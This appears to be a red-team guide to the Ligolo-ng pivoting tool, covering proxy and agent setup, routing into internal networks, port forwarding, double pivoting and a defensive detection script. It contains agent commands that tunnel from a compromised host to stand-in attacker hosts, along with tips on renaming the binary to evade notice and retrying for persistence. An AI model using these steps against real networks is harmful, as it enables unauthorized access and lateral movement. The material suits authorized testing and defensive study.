
Ligolo-ng
Comprehensive guide to Ligolo-ng, a modern tunneling and pivoting tool for red team operations, featuring TUN interface support, multi-platform agents, and secure TLS communications.
Introduction
Ligolo-ng is a tunneling tool that creates TUN interfaces for direct network routing. Unlike SOCKS proxies, it allows you to route traffic to internal networks without per-tool proxychains configuration.
The tool consists of two components:
- Proxy - Runs on the attacker's machine, creates TUN interfaces
- Agent - Runs on the compromised target, requires no privileges
Why Ligolo-ng?
Ligolo-ng offers significant advantages over traditional pivoting tools:
- No SOCKS configuration needed - Route traffic directly via TUN interfaces
- Cross-platform agents - Windows, Linux, macOS support
- No privileges required on the agent side
- TLS encryption - Secure communications with certificate validation
- Multi-session support - Handle multiple agents simultaneously
Installation
Proxy (Attacker Machine)
# Download latest release
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_Linux_64bit.tar.gz
tar -xzf ligolo-ng_proxy_Linux_64bit.tar.gz
# Or build from source
git clone https://github.com/nicocha30/ligolo-ng
cd ligolo-ng
go build -o proxy cmd/proxy/main.go
Agent (Target Machine)
Download the appropriate agent binary for the target OS from the releases page.
Quick Start
1. Create TUN Interface (Linux)
# Create TUN interface
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
# Or use Ligolo-ng v0.6+ built-in command (after starting proxy)
ligolo-ng » interface_create --name ligolo
2. Start the Proxy
# Using self-signed certificate (lab environments)
sudo ./proxy -selfcert
# Using Let's Encrypt (requires port 80)
sudo ./proxy -autocert
# Using custom certificates
sudo ./proxy -certfile cert.pem -keyfile key.pem
3. Deploy and Run Agent
# On target machine
./agent -connect <ATTACKER_IP>:11601 -ignore-cert
# With certificate validation (recommended for production)
./agent -connect <ATTACKER_IP>:11601 -accept-fingerprint <FINGERPRINT>
4. Configure Tunnel
# Select the agent session
ligolo-ng » session
? Specify a session: 1 - user@target - 10.10.10.5:38000
# View target network interfaces
[Agent: user@target] » ifconfig
# Start the tunnel
[Agent: user@target] » tunnel_start --tun ligolo
# Add route to internal network
sudo ip route add 192.168.1.0/24 dev ligolo
# Or using Ligolo-ng CLI
ligolo-ng » interface_add_route --name ligolo --route 192.168.1.0/24
Advanced Usage
Accessing Agent's Local Ports
Ligolo-ng reserves a special CIDR 240.0.0.0/4 for accessing the agent's localhost:
# Add route to magic CIDR
sudo ip route add 240.0.0.1/32 dev ligolo
# Now access agent's local services
nmap 240.0.0.1 -sV
curl http://240.0.0.1:8080
Port Forwarding (Listeners)
Forward ports from the agent to your machine:
# Forward agent's port 3389 to your localhost:3389
[Agent: user@target] » listener_add --addr 0.0.0.0:3389 --to 127.0.0.1:3389 --tcp
# List active listeners
[Agent: user@target] » listener_list
# Remove listener
[Agent: user@target] » listener_stop --id 0
Double Pivoting
For multi-hop scenarios (Agent1 → Agent2 → Internal Network):
# Create second TUN interface
ligolo-ng » interface_create --name ligolo2
# On Agent1, forward port to Agent2
[Agent1] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
# Connect Agent2 through Agent1
# On second compromised host
./agent -connect <AGENT1_IP>:11601 -ignore-cert
# Select Agent2 and start tunnel on ligolo2
[Agent2] » tunnel_start --tun ligolo2
# Add routes for the deeper network
sudo ip route add 10.10.10.0/24 dev ligolo2
TLS Certificate Validation
For secure operations, validate certificates:
# Get certificate fingerprint from proxy
ligolo-ng » certificate_fingerprint
INFO[0203] TLS Certificate fingerprint: D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC
# Connect agent with fingerprint validation
./agent -connect attacker.com:11601 -accept-fingerprint D005527D...
Platform-Specific Configuration
Windows Proxy Setup
- Download Wintun driver
- Place wintun.dll in same directory as proxy
- Run proxy as Administrator
# Add route on Windows
route add 192.168.1.0 mask 255.255.255.0 0.0.0.0 if <INTERFACE_IDX>
# Find interface index
netsh int ipv4 show interfaces
macOS Setup
# Create interface
sudo ifconfig utun4 alias 10.0.0.1 255.255.255.0
# Add route
sudo route add -net 192.168.1.0/24 -interface utun4
# Start tunnel (use utun device)
[Agent] » tunnel_start --tun utun4
Command Reference
Proxy Commands
| Command | Description |
|---|---|
| session | Select an agent session |
| sessions | List all connected agents |
| interface_create | Create new TUN interface |
| interface_list | List TUN interfaces |
| certificate_fingerprint | Show TLS certificate fingerprint |
Agent Session Commands
| Command | Description |
|---|---|
| ifconfig | Show agent's network interfaces |
| tunnel_start | Start tunnel on specified TUN |
| tunnel_stop | Stop active tunnel |
| listener_add | Create port forward |
| listener_list | List port forwards |
| listener_stop | Remove port forward |
Operational Security
OPSEC Considerations
- Use certificate validation in production environments
- Agent binary can be renamed to blend in
- Consider agent auto-retry for persistence:
./agent -connect host:11601 -retry
- Traffic is encrypted but connection patterns may be detectable
Detection
Defenders may detect Ligolo-ng through:
- Outbound connections to uncommon ports (default 11601)
- TLS connections with self-signed certificates
- Unusual network traffic patterns from compromised hosts
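The three indicators above are individually weak, so a practical rule alerts only when several coincide on one outbound connection. The following is an added example, not part of the original guide or the Ligolo-ng project; the record field names, the one-hour "long-lived" threshold, and the sample records are constructed assumptions.

```python
import ipaddress
import json

LIGOLO_DEFAULT_PORT = 11601   # default proxy port named in this guide
LONG_LIVED_SECONDS = 3600     # assumption: tunnels tend to stay open; tune per network
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed flow/TLS records; field names are hypothetical, map them to your sensor's schema.
SAMPLE = """\
{"src":"10.0.5.23","dst":"203.0.113.40","dport":11601,"tls":true,"subject":"CN=host.example","issuer":"CN=host.example","duration":5400}
{"src":"10.0.5.23","dst":"198.51.100.7","dport":443,"tls":true,"subject":"CN=www.example.org","issuer":"CN=Example CA","duration":12}
{"src":"10.0.7.9","dst":"203.0.113.77","dport":443,"tls":true,"subject":"CN=srv","issuer":"CN=srv","duration":7200}
{"src":"10.0.8.2","dst":"10.0.9.9","dport":11601,"tls":false,"subject":"","issuer":"","duration":3}
"""

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)

def indicators(rec):
    """Return the detection indicators from this guide that a record matches."""
    if not is_internal(rec["src"]) or is_internal(rec["dst"]):
        return []  # only egress from internal hosts is in scope
    hits = []
    if rec["dport"] == LIGOLO_DEFAULT_PORT:
        hits.append("default-port")
    # Self-signed leaf certificate: issuer equals subject
    if rec["tls"] and rec["subject"] and rec["subject"] == rec["issuer"]:
        hits.append("self-signed")
    if rec["duration"] >= LONG_LIVED_SECONDS:
        hits.append("long-lived")
    return hits

def triage(lines, min_hits=2):
    """Alert only when several weak indicators coincide on one connection."""
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        hits = indicators(rec)
        if len(hits) >= min_hits:
            alerts.append((rec["src"], rec["dst"], rec["dport"], hits))
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE):
        print(alert)
```

The third sample record alerts even though it uses port 443, which is why a rule keyed only on port 11601 is not sufficient.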
Related Resources
- Impacket - Complementary tools for Windows attacks
- Sliver - C2 framework with built-in pivoting
- Network Attacks - Services to target through pivots
References
MITRE ATT&CK Techniques
- T1572 - Protocol Tunneling - TUN interface tunneling
- T1090.001 - Proxy: Internal Proxy - Internal network pivoting
- T1090.002 - Proxy: External Proxy - Outbound proxy chains
- T1095 - Non-Application Layer Protocol - Network tunneling
- T1021 - Remote Services - Accessing internal services
Official Documentation
- Ligolo-ng GitHub - Source code
- Ligolo-ng Wiki - Configuration guide